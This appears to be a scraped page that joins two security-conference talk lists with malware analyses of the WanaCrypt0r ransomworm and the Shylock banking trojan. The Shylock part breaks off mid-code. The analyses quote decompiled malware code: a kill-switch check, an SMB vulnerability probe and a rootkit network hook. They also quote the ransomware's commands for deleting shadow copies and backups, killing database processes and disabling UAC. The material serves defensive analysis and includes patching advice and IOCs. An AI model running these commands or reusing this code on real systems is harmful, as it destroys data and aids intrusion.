Look Ma - No Exploits! - The Recon-ng Framework - Tim “LaNMaSteR53? Tomes
Practical Exploitation Using A Malicious Service Set Identifier (SSID) - Deral Heiland
JTAGulator: Assisted discovery of on-chip debug interfaces - Joe Grand
Seeing red in your future? - Ian Iamit
TMI: How to attack SharePoint servers and tools to make it easier - Kevin Johnson and James Jardine
The High Risk of Low Risk Applications - conrad reynolds
It’s Okay to Touch Yourself - Ben Ten (Ben0xA)
Collaborative Penetration Testing With Lair - Tom Steele and Dan Kottmann
Malware Automation - Christopher Elisan
What’s common in Oracle and Samsung? They tried to think differently about crypto. - L·szlÛ TÛth - Ferenc Spala
Burning the Enterprise with BYOD - Georgia Weidman
Getting the goods with smbexec - Eric Milam(brav0hax) and Martin Bos (purehate)
Shattering the Glass: Crafting Post Exploitation Tools with PowerShell - Matt Johnson
Cheat Codez: Level UP Your SE Game - Eric Smith
My Experiments with truth: a different route to bug-hunting - Devesh Bhatt
The Art and Science of Hacking Any Organization - Tyler Wrightson
Living Off the Land: A Minimalist’s Guide to Windows Post-Exploitation - Christopher Campbell & Matthew Graeber
Cracking Corporate Passwords - Exploiting Password Policy Weaknesses - Minga / Rick Redman
Ownage From Userland: Process Puppeteering - Nick Cano
) UNION SELECT `This_Talk` AS (‘New Exploitation and Obfuscation Techniquesí)%00 - Roberto Salgado
Exploiting_the_Zeroth_Hour(); Developing your Advanced Persistent Threat to Pwn the Network - SOLOMON SONYA and NICK KULESZA
Phishing Like The Pros - Luis “Connection” Santana
Raspberry Pi - Media Centers - and AppleTV - David Schuetz
Cognitive Injection: Reprogramming the Situation-Oriented Human OS - Andy Ellis
IOCAware - Actively Collect Compromise Indicators and Test Your Entire Enterprise - Matt Jezorek and Dennis Kuntz
Cash is King: Who’s Wearing Your Crown? - Tom Eston and Spencer McIntyre
Security Sucks - and You’re Wearing a Nursing Bra - Paul Asadoorian
Windows Attacks: AT is the new black - Rob Fuller and Chris Gates
How Good is Your Phish - @sonofshirt
Identifying Evil: An introduction to Reverse Engineering Malware and other software - Bart ‘d4ncind4n’ Hopper
How Im going to own your organization in just a few days. - RazorEQX
Pass-The-Hash 2: The Admin’s Revenge - Skip Duckwall and Chris Campbell
The Cavalry Is Us: Protecting the public good and our profession - Josh Corman
Love letters to Frank Abagnale (How do I pwn thee let me count the ways) - Jayson E. Street
The Message and The Messenger - James Arlen
50 Shades of RED: Stories from the "Playroom" - Chris Nickerson
Beyond Information Warfare “You Ain’t Seen Nothing Yet” - Winn Schwartau
Stop Fighting Anti-Virus - Integgroll
How the Grid Will Be Hacked - Josh Axelrod and Matt Davis
help for the helpdesk - Mick Douglas
Weaponizing your Coffee Pot - Daniel Buentello
Practical OSINT - Shane MacDougall (NOTE THAT THIS IS AN ADULT ONLY TALK - 18+ or older)
Stop making excuses; it’s time to own your HIV (High Impact Vulnerabilities) - Jack D. Nichelson
Uncloaking IP Addresses on IRC - Derek Callaway


          BSidesLV 2013 Videos        
Videos: http://www.irongeek.com/i.php?page=videos/bsideslasvegas2013/mainlist
These are the videos from the BSides Las Vegas conference. Thanks to all of the BSides Crew for having me out to help record and render the videos. @bsideslv, @banasidhe, @kickfroggy, @quadling, @jack_daniel 

"The Security Industry - How to Survive Becoming Management" - Christien Rioux

Discovering Dark Matter: Towards better Android Malware Heuristics - Jimmy Shah, David Shaw, Matt Dewitt

Mom! I Broke My Insulin Pump... Again! - Jay "Rad" Radcliffe

Dungeons & Dragons, Siege Warfare, and Fantasy Defense in Depth - Evan Davidson and Noah Schiffman

HiveMind: Distributed File Storage Using JavaScript Botnets - Sean Malone

gitDigger: Creating useful wordlists from public GitHub repositories - WiK and Mubix

Collaborative Penetration Testing With Lair - Tom Steele and Dan Kottmann

Social Aftermath Responding to Social Pwnage - Steven F. Fox

Silence Equals Death - Violet Blue

The Cavalry Isn't Coming: Starting the Revolution to Fsck it All! - Nicholas J. Percoco and Joshua Corman

A Fire In The Eye - Olli-Pekka Niemi and Antti Levomaki

Defense Evasion Modeling - Frank Artes

"Malware Management Framework" - We detected WinNTI with it! - Michael Gough

Crunching the Top 10,000 Websites' Password Policies and Controls - Steve Werby

Governments and UFOs: A Historical Analysis of Disinformation and Deception - Richard Thieme

Strange interactions in personal data: Brokers and the CFAA - Christine Dudley

Diamonds, Fitness and Cults: Manipulation for Fun and Profit - Katie Rodzon

Vulnerability & Exploit Trends: A Deep Look Inside The Data - Ed Bellis, Michael Roytman

EC2 or Bust - How to Build Your Own Pen Testing Lab in Amazon EC2 - Grecs

Techniques for Escaping the AppSec Labyrinth - Andrew Hay

The Erudite Inebriate's Guide to Life, Liberty, and the Purfuit of Happinefs - Jack Daniel

Hack the Hustle! Career Strategies for Information Security Professionals - Eve Adams

Information Sharing, or "I've got 99 problems and they're probably pretty similar to yours" - Chris Mills

Convincing Your Management, Your Peers, and Yourself That Risk Management Doesn't Suck - Josh Sokol

How embracing social media helped me stop the hackers, save the world and get the girl! - Javvad Malik

Malware Automation - Christopher Elisan

Popping the Penguin: An Introduction to the Principles of Linux Persistence - Mark Kita

Network Survival WCS - James Costello

The Slings and Arrows of Open Source Security - Tod Beardsley and Mister X

What if Petraeus was a hacker' Email privacy for the rest of us - Fak3r

Never Mind Your Diet, Cut the Crap From Your Vocabulary - Keli Hay (Brian Martin)

The 7 habits of highly effective CISOs - Franklin Tallah (Wendy Nather)

The Little Dutch Boy - D0n Quix0te (Bill E. Ghote)

Stop Shooting Blanks: No magic bullets in your arsenal - Renegade6 (Nicolle Neulist)

Flameout - Burnout Supernova - Dan Ward (Ally Miller)

The Sensual Side of 3D Printing - Kat Sweet (Javvad Malik)

Fun with WebSockets using Socket Puppet - Mister Glass (Weasel)

Using Machine Learning to Support Information Security - Alex Pinto (Joel Wilbanks)

The Truth, You Thought We Wouldn't Know' - Wolf Flight (Terry Gold)

Vulnerabilities in Application Whitelisting: Malware Case Studies - Jared Sperli and Joe Kovacic (J0hnny Brav0)

The Goodness is Baked In: Baking Assurance into Software - Ebony (Davi Ottenheimer)

Matriux Leandros:An Open Source Penetration Testing and Forensic Distribution - Prajwal Panchmahalkar (Savant42)

Sixteen Colors: Archiving the Evolution of ANSI and ASCII Art - Doug Moore (Brendan O'Connor)

You Are Being Watched! - Bharat Jogi

Calling All Researchers: A Discussion on Building a Security Research Framework - Michael "DrBearSec" Smith

Evil Empire: SIEM FTW - EggDropX and Tha CheezMan

Attribution Shmatribution! FIX YOUR SHIT! - Krypt3ia

Breach Panel - Davi Ottenheimer, Raymond Umerley, Jack Daniel, Steve Werby, David Mortman & George V. Hulme

Roll-your-own Lightning Talks

Attacking and Defending Full Disk Encryption - Tom Kopchak

Say It to My Face - Shannon Sistrunk

Alex Dreams of Risk: How the Concept of Being a Craftsman can Help you Find Meaning and Avoid Burnout - Alex Hutton

You can't make people act more securely, you can help them want to. - Ivan Campbell and Twyla Campbell


          WanaCrypt0r Ransomworm        
Written by Sergei Shevchenko and Adrian Nish
BACKGROUND

Since the release of the ETERNALBLUE exploit by ‘The Shadow Brokers’ last month security researchers have been watching for a mass attack on global networks. This came on Friday 12th May when it was bundled with ransomware called WanaCrypt0r and let loose. Initial reports of attacks were highlighted by Telefonica in Spain but the malware quickly spread to networks in the UK where the National Health Service (NHS) was impacted, followed by many other networks across the world.

The infographic below illustrates the key components of the WanaCrypt0r ransomware. This is described in further detail in subsequent sections of this report along with initial clues on attribution.


ANALYSIS: Initial Vector

The initial infection vector is still unknown. Reports by some of phishing emails have been dismissed by other researchers as relevant only to a different (unrelated) ransomware campaign, called Jaff.

There is also a working theory that initial compromise may have come from SMB shares exposed to the public internet. Results from Shodan show over 1.5 million devices with port 445 open – the attacker could have infected those shares directly.
The Dropper/Worm

The infection starts from a 3.6Mb executable file named mssecsvc.exe or lhdfrgui.exe. Depending on how it's executed, it can function as a dropper or as a worm.

When run, the executable first checks if it can connect to the following URL:

http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com

The connection is checked with the WinINet functions, shown below:

01 qmemcpy(&szUrl,
02         "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com",
03         57u);
04 h1 = InternetOpenA(0, INTERNET_OPEN_TYPE_DIRECT, 0, 0, 0);
05 h2 = InternetOpenUrlA(h1, &szUrl, 0, 0,
06                       INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE,
07                       0);
08 if (h2)
09 {
10   InternetCloseHandle(h1);     // if connection succeeds, then quit
11   InternetCloseHandle(h2);
12   result = 0;
13 }
14 else
15 {
16   InternetCloseHandle(h1);     // if connection fails
17   InternetCloseHandle(0);
18   PAYLOAD();                   // then call the payload
19   result = 0;
20 }
21 return result;

That means that if the executable is unable to connect to the URL above, it will call the payload. Alternatively, it will activate a payload on an air-gapped system, such as a system within a hospital network.

It is also worth noting that this connection is not proxy aware, therefore in an enterprise IT environment it is unlikely to be able to connect to the domain triggering the payload.

If the executable is run with no command line parameters, it will register and then run itself as a service:

Service name: "mssecsvc2.0"
Service Description: "Microsoft Security Center (2.0) Service"
Service executable: "%ORIGINAL_NAME% -m security"

where %ORIGINAL_NAME% is the original name of the executable, such as mssecsvc.exe or lhdfrgui.exe.

Next, it will start the created service. The payload of the executable will load its own resource called "R/1831", and save it as:

c:\windows\tasksche.exe

The original c:\windows\tasksche.exe file is renamed into c:\windows\qeriuwjhrf.

Finally, the executable will execute the dropped resource as:

"c:\windows\tasksche.exe /i"

If this executable is started as a service, its service handling procedure will invoke a network replication code, explained below.

EternalBlue Port

Since the Shadow Brokers leaked the EquationGroup / NSA FuzzBunch software, a researcher with the handle @zerosum0x0 has reverse engineered the ETERNALBLUE SMBv1/SMBv2 exploit against Windows Server 2008 R2 SP1 x64. This was released on 21st April 2017.

As @zerosum0x0 predicted:

“Every major malware family, from botnets to ransomware to banking spyware, will eventually add the exploits in the FuzzBunch toolkit to their arsenal. This payload is simply a mechanism to load more malware with full system privileges... This is a jewel compared to the scraps that were given to Stuxnet. It comes in a more dangerous era than the days of Conficker. Given the persistence of the missing MS08-067 patch, we could be in store for a decade of breaches emanating from MS17-010 exploits. It is the perfect storm for one of the most damaging malware infections in computing history.”

This work was further expanded on with an open-source project "MS17-010 Windows SMB RCE", developed by RiskSense Operations, and includes both a Metasploit scanner and a Python port.

On 9th of May 2017, the Python port was further improved to "Store original shellcode in binary, rather than python string representation".

In order to "Make it faster", the shellcode was now declared as binary, further lowering the barrier of porting it into C++ code.

It appears that the ransomware took advantage of the published Python source, along with the shellcode binaries – the SMB structures found in the ransomware are identical to the published ones (e.g. the “Exploits” section of this project was used to infect remote hosts with DOUBLEPULSAR backdoor). The published raw SMB packets appear to be copy-pasted into C++ code, and then recompiled using ported blobs – most likely without even understanding how the EternalBlue SMBv1/SMBv2 exploit actually works.

A detailed description of the network replication and worm functionality is described in Appendix B.
The Payload

The payload is a 3.4Mb file called tasksche.exe, created from the worm's resource "1831". Such a large size is explained by the bundled TOR executables along with other tools and configuration files.

Internal name of this executable is diskpart.exe.

This file contains another embedded resource in it, named as "XIA/2058". This resource is a ZIP file.


If the file detects it was executed without the "/i" switch – that is, it was not executed by the worm, it will register itself as a service to provide itself with a persistence mechanism that does not require the worm.

For that, it will first generate a pseudo-random name that is derived from the current computer name. For example:

tdyhddeaprj852

Next, it will create read-only directories, and copy itself into those directories, such as:

  •   â€¢  c:\ProgramData\%RANDOM_NAME%\%EXE_NAME%
  •   â€¢  c:\Intel\%RANDOM_NAME%\%EXE_NAME%

where %RANDOM_NAME% is the previously generated pseudo-random name, and %EXE_NAME% is the name of its own executable.

For example:

  •   â€¢  c:\ProgramData\tdyhddeaprj852\tasksche.exe
  •   â€¢  c:\Intel\tdyhddeaprj852\tasksche.exe

Next, it will create a new service:

Service name: %RANDOM_NAME% Service Description: %RANDOM_NAME% Service executable: "cmd.exe /c %FULL_PATH_FILENAME%"

where %FULL_PATH_FILENAME% is the full path filename of the malicious executable.

Following this, it starts the service or directly runs the newly created executable as:

"cmd.exe /c %FULL_PATH_FILENAME%"

To make sure there is only one copy of the executable running, it relies on a mutex named as:

"Global\MsWinZonesCacheCounterMutexA"
Encryption Phase

The malware then proceeds to its file encryption phase.

It will register its working directory in the registry value:

HKLM\SOFTWARE\WanaCrypt0r\wd: "%WORKING_DIR%"

Next, it will unzip its embedded resource "XIA/2058" into the working directory, using ZIP password "WNcry@2ol7".

This will create a number of the files, such as a command line TOR executable, required libraries, ransom messages in various languages, and other tools:

  •   â€¢  b.wnry – a bitmap image with the ransom note in it
  •   â€¢  c.wnry – binary configuration file
  •   â€¢  r.wnry – a text file with the ransom note in it
  •   â€¢  s.wnry – a ZIP file with command line TOR executable, required libraries
  •   â€¢  t.wnry – encrypted ransomware DLL
  •   â€¢  taskdl.exe – an executable that enumerates and deletes temp files on each drive, looking for files with .WNCRYT extension in %DRIVE%:\$RECYCLE and %TEMP% directories
  •   â€¢  taskse.exe – an executable that starts @WanaDecryptor@.exe
  •   â€¢  u.wnry – ransomware’s decryptor executable that opens a GUI with a ransom note in it
  •   â€¢  msg\m_*.wnry – a directory with ransom notes in different languages

It will then read the unzipped configuration file c.wnry – this file contains the following list of .onion domains:

gx7ekbenv2riucmf.onion
57g7spgrzlojinas.onion
xxlvbrloxvriy2c5.onion
76jdd2ir2embyv47.onion
cwwnhwhlz52maqm7.onion

Next, it picks up a random Bitcoin address out of three hard-coded ones – the list below shows the balances at the time of analysis:

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 - 15.13562354 BTC = $26410
12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw - 13.78022431 BTC = $24045
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn - 5.98851225 BTC = $17361

Hence, the total amount of the collected ransom at the time of writing is ~USD$68K.

The selected Bitcoin address is then saved back into c.wnry file. Thus, the purpose of this file is to store configuration.

Next, the ransomware runs the following commands to assign 'hidden' attribute to all of its files and to allow full access rights for all users:

"attrib +h ."
"icacls . /grant Everyone:F /T /C /Q"

It then imports a 2048-bit public RSA key from a hard-coded 1,172-byte blob, stored within the executable. Next, it reads the unzipped resource file t.wnry that starts from a "WANACRY!" marker, and decrypts an AES key from here, using an RSA public key.

The recovered AES key is then used to decrypt the rest of t.wnry file contents, using AES-128 (CBC).

The blob decrypted from t.wnry turns out to be a PE-file - the malware parses its PE header, then dynamically loads into a newly allocated memory, and calls its entry point.

This PE file is a DLL, and the called entry point corresponds to its DllEntryPoint() export.

Internal name of this DLL is kbdlv.dll. The malware locates and then calls its export TaskStart().
The Ransomware DLL

The main DLL module of the ransomware has an internal name kbdlv.dll. Its export TaskStart() is called to invoke the ransomware’s file encryption logic.

The DLL first creates a mutex "MsWinZonesCacheCounterMutexA" to make sure there is only one copy of ransomware activated. Next, it reads c.wnry - a configuration file that stores the list of TOR services.

The ransomware will attempt to terminate a number of processes, such as SQL server and MS Exchange server, by running commands:

taskkill.exe /f /im mysqld.exe
taskkill.exe /f /im sqlwriter.exe
taskkill.exe /f /im sqlserver.exe
taskkill.exe /f /im MSExchange*
taskkill.exe /f /im Microsoft.Exchange.*

It will then spawn a number of threads, including a file encryption thread.

It will not attempt to encrypt files within directories that contain following strings in their names:

  •   â€¢  \Intel
  •   â€¢  \ProgramData
  •   â€¢  \WINDOWS
  •   â€¢  \Program Files
  •   â€¢  \Program Files (x86)
  •   â€¢  \AppData\Local\Temp
  •   â€¢  \Local Settings\Temp
  •   â€¢  This folder protects against ransomware. Modifying it will reduce protection
  •   â€¢  Temporary Internet Files
  •   â€¢  Content.IE5

Before the encrypted files are written, the ransomware checks the free disk space with GetDiskFreeSpaceExW() to make sure it does not run out of free space.

Finally, the DLL creates a copy of the previously unzipped file u.wnry, saving and then running it as @WanaDecryptor@.exe.
The Ransomware EXE

The EXE module @WanaDecryptor@.exe is run by the DLL (a copy of the previously unzipped file u.wnry). It is a GUI application with the window name being "Wana Decrypt0r 2.0".

To delete Windows shadow copies, it runs the commands:

cmd.exe /c vssadmin delete shadows /all /quiet &
wmic shadowcopy delete &
bcdedit /set {default} bootstatuspolicy ignoreallfailures &
bcdedit /set {default} recoveryenabled no &
wbadmin delete catalog -quiet

This executable will connect to C&C via TOR .onion domains, in order to anonymise its C&C traffic.

Once the ransom is paid, the executable is able to check the status of the payment, and allow file decryption.
Attribution

The WanaCrypt0r ransomware released on 12th May is not the only version. Earlier this year, there was another version released (example MD5: 9c7c7149387a1c79679a87dd1ba755bc).

The older version has a timestamp of 9th February 2017, and was first submitted to VirusTotal on 10th February 2017.

Similar to the latest version, it also relies on external files, only the used extension is .wry instead of .wnry:

  •   â€¢  n.wry
  •   â€¢  cg.wry
  •   â€¢  t1.wry
  •   â€¢  t2.wry

The latest version downloads a TOR client from:
https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip

The older version downloads a TOR client from:
https://www.torproject.org/dist/torbrowser/6.0.8/tor-win32-0.2.8.11.zip

Both old and new version extract the ZIP file into the TaskData folder.

It's worth noting that the older variant of ransomware also attempted to replicate across \\%IP%\ipc$ network shares. Hence, the idea of the network replication was brewing in the attackers' minds long before 'The Shadow Brokers' release.

The older version of WanaCrypt0r ransomware relies on a function that generates a random buffer, using an internal table that consists of 75 WORDs:

The implementation of this function is very unique - it cannot be found in any legitimate software. The only other sample where this function can also be found (almost identical, but with minor tweaks) is a sample of Contopee backdoor (MD5: ac21c8ad899727137c4b94458d7aa8d8), first submitted to VirusTotal on 15th August 2015.

This code overlap was first noticed and tweeted by Google researcher Neel Mehta. This was quickly followed up on by Kaspersky Labs in a blogpost.

The Contopee backdoor sample uses this function as part of its communication protocol with the C&C server. This backdoor family is a tool from the Lazarus threat actors.

The re-use of code is a characteristic of the Lazarus group we noted in our report last year on attacks against SWIFT systems. This re-use is at the source-code level, providing strong evidence of common development environment.

This, along with other overlaps with Lazarus’ previous campaigns is described below:

CharacteristicLazarus code exampleWanaCrypt0r example
Random buffer generator functionAugust 2015
Contopee backdoor:
ac21c8ad899727137c4b94458d7aa8d8
January 2017
WanaCrypt0r: 9c7c7149387a1c79679a87dd1ba755bc
Code / CompilerC++ / Visual Studio 6.0C++ / Visual Studio 6.0
‘leetspeak’y0uar3@s!llyid!07
Referenced in US-CERT alert following SONY attack.
WANACRY!
WNcry@2ol7
CryptoCurrencyLazarus has targeted Bitcoin related companies in recent months – possibly looking for ways to steal/launder funds.
A watering-hole (same as described in our blog) was setup in February on a popular Bitcoin website.
WanaCrypt0r uses Bitcoin addresses to receive ransom payments.

As noted in our attribution post last year, use of Visual Studio 6.0 is not a significant observation on its own – however, this development environment dates from 1998 and is rarely used by malware coders. Nonetheless, it has been seen repeatedly with Lazarus attacks.

CONCLUSIONS

Coupling an SMB worm to ransomware has created a highly effective threat – albeit one which wreaks havoc for relatively little monetary gain. Even though $68K may represent a modest profit for the attackers, moving the money from those bitcoin wallets will attract significant attention from law-enforcement and could identify their money-laundering networks. It is very likely they will not get their hands on any money once this is all over.

Whilst the SMB worm code has been copy/pasted from elsewhere, the ransomware author is clearly an experienced malware-dev. They include checks such as filepaths for anti-ransomware products to avoid detection of their operation. There are mistakes though, such as the “kill-switch” which has been widely discussed. Assuming they used the Python port of code released on 9th May, it implies a very short turn around between development and attack; it is therefore possible the worm got loose whilst the code was still in testing. Either way, the attackers will learn from this campaign, and may return with updated code whilst vulnerabilities remain unpatched.

The linkages to the Lazarus campaign are tantalising clues as to who may be ultimately behind this. Following on from last year's attacks on SWIFT systems and this year's attacks on banks in Poland & Mexico they continue to demonstrate that they are a considerable menace to network defenders. Understanding their tools, techniques and procedures is challenging given the shifting nature of attacks seen, however deserves maximum focus and co-operation across the security community.

The biggest lesson to be learned from this attack though is the on-going challenge which organisations running critical infrastructure face with patching. This isn’t the first case of self-propagating malware impacting healthcare networks we’ve investigated; indeed this reminds us a lot of the QBot/Qakbot episode last year. Then, as now, hospitals are exposed by running on out-of-date systems and with minimal resources to spend on security. The WanaCrypt0r campaign has brought this to international attention – how to fix the problem going forward will need swift debate among technology experts and policy makers to avert similar crises in future.
RECOMMENDATIONS

  •   â€¢  Install patch MS17-010 as a matter of urgency. For out of support operating systems such as XP, Win8 and Server 2003 apply the out of band patch.
  •   â€¢  Add in the following SNORT Rules to IDS devices:
    http://doc.emergingthreats.net/bin/view/Main/2024218
  •   â€¢  Block all outgoing connections on port 137,139, 445 and 3389 (i.e. internal to external) to stop the worm spreading externally.
  •   â€¢  Block all incoming connections on ports 137,139, 445 and 3389 (i.e external to internal) to stop the worm coming into the network.
  •   â€¢  Consider blocking connections on port 445 (SMB shares) internally if not business critical until the worm has subsided.
  •   â€¢  Ensure that connections to the domain: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com are permitted, This is site is reported to act as a kill switch, for some variants, preventing encryption. Connectivity can be tested with the following python script.

We also suggest noting the recommendations from:

APPENDIX A – Indictors of compromise

C&C Domain
gx7ekbenv2riucmf[.]onion
57g7spgrzlojinas[.]onion
xxlvbrloxvriy2c5[.]onion
76jdd2ir2embyv47[.]onion
cwwnhwhlz52maqm7[.]onion
iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com

MD5 Hashes
4fef5e34143e646dbf9907c4374276f5
509c41ec97bb81b0567b059aa2f50fe8
7bf2b57f2a205768755c07f238fb32cc
7f7ccaa16fb15eb1c7399d422f8363e8
8495400f199ac77853c53b5a3f278f3e
84c82835a5d21bbcf75a61706d8ab549
db349b97c37d22f5ea1d1841e3c89eb4
f107a717f76f4f910ae9cb4dc5290594
APPENDIX B – The Network Replicator

The worm replicates across the network using two threads: the first one provides replication across the local network, and the second one - across random IP ranges, thus affecting external addresses (such as honeypots or other exposed SMB shares).

To replicate across internal network, the worm first calls GetAdaptersInfo() to obtain network configuration for each network adapter associated with the system.

The network configuration allows it to use current IP address and mask to build a list of local IP addresses.

For example, if the local IP address is 192.168.78.132, and the subnet mask is 255.255.255.0, the worm may build a list of 254 IP addresses that are displayed below in their binary format, such as 014EA8C0 ("192.168.78.1"), 024EA8C0 ("192.168.78.2"), and up to FE4EA8C0 ("192.168.78.254"):


NOTE: the constructed list is trailed with the BAADF00D markers.

This list is then passed to a newly spawned thread to enumerate it, and the worm will then attempt to replicate to each target in the list.

The second network replication thread is spawned each 2 seconds up to 128 times. Each instance of this thread will generate a random IP consisting of 4 octets:

IP1.IP2.IP3.IP4

Each octet is a random value from 0 to 255, generated using CryptGenRandom() API - a cryptographically secure pseudorandom number generator.

First octet IP1 cannot be set to 127, 224, or 225. If the worm is able to connect to a target with IP address IP1.IP2.IP3.IP4 over port 445, it will then enumerate 255 IP addresses from IP1.IP2.IP3.1 to IP1.IP2.IP3.255. The worm will attempt to replicate to each enumerated target.

This thread is spawned 128 times - the round number is passed to the thread as an argument, so it is aware about the current round of its own execution. The thread uses it along with an internal timer (using 20 and 40 minute intervals) to define the logic of regeneration of IP1 and IP2 parts of the random IPs.

Both threads rely on the same network propagation mechanism: for each target IP, the worm first attempts to connect on port 445 and submit it two SMB requests, with an attempt to establish if the MS17_010 SMB Vulnerability exists:

  •   â€¢  negotiate_proto_request
  •   â€¢  session_setup_andx_request

The code below shows how these packets are submitted:

01   name.sa_family = 2;
02   *(_DWORD *)&name.sa_data[2] = inet_addr(cp);
03   *(_WORD *)&name.sa_data[0] = htons(hostshort);
04   hSocket = socket(2, 1, 0);
05   __hSocket = hSocket;
06   if ( hSocket != -1 )
07   {
08     if ( connect(hSocket, &name, 16) != -1
09       && send(__hSocket, negotiate_proto_request, 88, 0) != -1
10       && recv(__hSocket, &buf, 1024, 0) != -1
11       && send(__hSocket, session_setup_andx_request, 103, 0) != -1
12       && recv(__hSocket, &buf, 1024, 0) != -1 )

On a network level, WireShark recognises these two packets as Negotiate Protocol Request and Session Setup AndX Request.

Negotiate Protocol Request:

Session Setup AndX Request:

The disassembled source of the worm shows how the Negotiate Protocol Request is built:

The disassembled source shows the Session Setup AndX Request (only the end of it is shown):


The Session Setup AndX Request will get a response, and the code parses it to extract the native_os field from it.

Following this, the worm composes an IPC share name such as:

\\%IP_ADDRESS%\IPC

Next, the ransomware submits two other SMB requests:

  •   â€¢  tree_connect_andx_request
  •   â€¢   peeknamedpipe_request

First, the Tree Connect AndX Request:

Once the host responds, the code will read tree_id, process_id, user_id, and multiplex_id, in order construct a new SMB request. In that new request, the following placeholders within request templates will be replaced with the extracted values:

  •   â€¢  __TREEID__PLACEHOLDER__
  •   â€¢  __USERID__PLACEHOLDER__
  •   â€¢  __TREEPATH_REPLACE__

The PeekNamedPipe Request is then submitted, recognised in WireShark as:

The SMB header extracted from the received response is then parsed to see if nt_status contained in it equals 0x0C000205. Here is how the malware parses the four bytes of such status (bytes 05, 02, 00, 0C):

01 if (send(__hSocket, peeknamedpipe_request, 78, 0) != -1 // if sent
02     && recv(__hSocket, &buf, 1024, 0) != -1 // and recv() is Ok
03     && nt_status_0 == 5                // and nt_status byte #0=05
04     && nt_status_1 == 2                // and nt_status byte #1=02
05     && !nt_status_2                    // and nt_status byte #2=00
06     && nt_status_3 == 0xC0u)           // and nt_status byte #3=0C
07      {                                 // if nt_status==0x0C000205
08           closesocket(__hSocket);
09           return 1; // return TRUE, host is vulnerable to MS17-010
10      }
11 ...
12 return 0; // return FALSE â€“ the host is NOT vulnerable

If the host is vulnerable to MS17-010, the worm waits for three seconds and then checks if it is already infected with DOUBLEPULSAR – in order to replicate itself, it needs an active DOUBLEPULSAR backdoor to be installed at the host.

In order to check that, it builds and then submits SMB Trans2 Request or trans2_request.

As seen below, the subcommand field within trans2_request request is set to SESSION_SETUP, which is a covert beacon request to the DOUBLEPULSAR backdoor:

If the host is infected with DOUBLEPULSAR, the response will contain "Multiplex ID" set to 81 (0x51). Here, the worm sends trans2_request request, and checks if multiplex_id equals 0x51:

Shylock
Written by Sergei Shevchenko, Cyber Research



"I will buy with you, sell with you, talk with you, walk with you, and so following;  
but I will not eat with you, drink with you, nor pray with you"    
Shylock, 1.3.37  
The Merchant of Venice, Shakespeare, 1564    





Shylock-The-Trojan will indeed talk to you via Skype; walk with you while you browse Internet or while you buy or sell online. Ironically, this Man-in-the-browser (MitB) trojan considers the homeland of Shakespeare its target #1.

Being a banking trojan that targets multiple banking institutions, it employs a plug-in architecture that allows complementing the main 'framework' with additional functionality. Shylock plug-ins are DLLs with the exports:
  • Destroy()
  • Init()
  • Start()
This description enlists main Shylock's components, one-by-one.

Driver

Shylock driver is a kernel-mode rootkit that is designed to hide files, processes, registry entries, and traffic that is associated with Shylock. In addition to that, it also switches off Windows UAC by resetting the value:

EnableLUA = 0x00000000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System


With UAC disabled, Windows Vista/7/8 will no longer prompt for consent or for credentials for a valid administrator account before launching a Shylock executable, allowing it to start silently.

If the Windows version is Vista, 7, or 8, it will obtain "NSI proxy" driver and then it will hook its IRP_MJ_DEVICE_CONTROL dispatch routine. On a pre-Vista Windows OS, it will also hook IRP_MJ_DEVICE_CONTROL dispatch routine within TCP driver.

The reason why Shylock hooks "NSI proxy" driver is to hide itself from netstat - a tool that is often used by technically savvy users to check for active connections that are present on a compromised PC: to inspect any open ports and to see what executables are holding any active connections. In those scenarios where Shylock engages its user-mode VNC component, the remote attacker will have full remote access to the compromised system: its graphical desktop will be fully relayed to the attacker, along with the keyboard and mouse events. The generated VNC traffic is thus relatively 'heavy' and so, there is a high chance it will eventually draw attention from the end user (e.g. the user might keep wondering why the modem LEDs are blinking so wildly). In that case, the netstat tool becomes one of the first tools to be run to see what's going with a system, and Shylock doesn't like that.

Whenever netstat is run, its calls are marshalled into the kernel and are eventually handled by "NSI proxy" driver. The hook it installs is known as IRP-hook. The hook handler it places will monitor enumerated connections, and whenever it locates a TCP connection that involves any particular port number that it needs to hide (e.g. responsible for VNC traffic), it will remove such TCP connection entry from the enumerated list. The removal of element N from the list is made by rewriting its contents with the contents of the element N+1, and then decrementing the total number of list elements by 1. As a result, the list of enumerated connections that is returned by netstat will never contain any active connections that are held by Shylock's user-mode components.

Here is the reconstructed logic of the hooker:

if (MajorVersion < 6) // if pre-Vista, hook Tcp driver; otherwise, skip this step
{
RtlInitUnicodeString(&uniTcpDevice, L"\\Device\\Tcp");
status = IoGetDeviceObjectPointer(&uniTcpDevice,
1u,
&FileObject,
&DeviceObject); // return device object
status2 = status;
if (status >= 0) // if status is OK
{
driverTcpDevice = (int)DeviceObject->DriverObject; // get driver object
IRP_MJ_DEVICE_CONTROL = driverTcpDevice + 0x70; // +0x70 is explained below
fn_IRP_MJ_DEVICE_CONTROL = *(DWORD *)(driverTcpDevice + 0x70);
if (fn_IRP_MJ_DEVICE_CONTROL) // if the returned dispatch routine is Ok
{
hook_IRP_MJ_DEVICE_CONTROL = get_hook_IRP_MJ_DEVICE_CONTROL_tcp;

replace_original_IRP: // swap original pointer with the hook

_InterlockedExchange((signed __int32 *)IRP_MJ_DEVICE_CONTROL,
hook_IRP_MJ_DEVICE_CONTROL);
return 0;
}
return 0;
}
exit:
ms_exc.disabled = -1;
return status;
}

RtlInitUnicodeString((PUNICODE_STRING)&uniNsiDrvName, L"\\Driver\\nsiproxy");
status = ObReferenceObjectByName(&uniNsiDrvName,
64,
0,
0,
IoDriverObjectType,
0,
0,
&pNsiDrvObj); // get driver object
status2 = status;
if (status < 0)
{
goto exit;
}

IRP_MJ_DEVICE_CONTROL = pNsiDrvObj + 0x70; // 0x70 means
// MajorFunction[IRP_MJ_DEVICE_CONTROL]

fn_IRP_MJ_DEVICE_CONTROL_2 = *(int (__stdcall **)(DWORD, DWORD))(pNsiDrvObj + 0x70);

if (fn_IRP_MJ_DEVICE_CONTROL_2) // if the returned dispatch routine is Ok
{
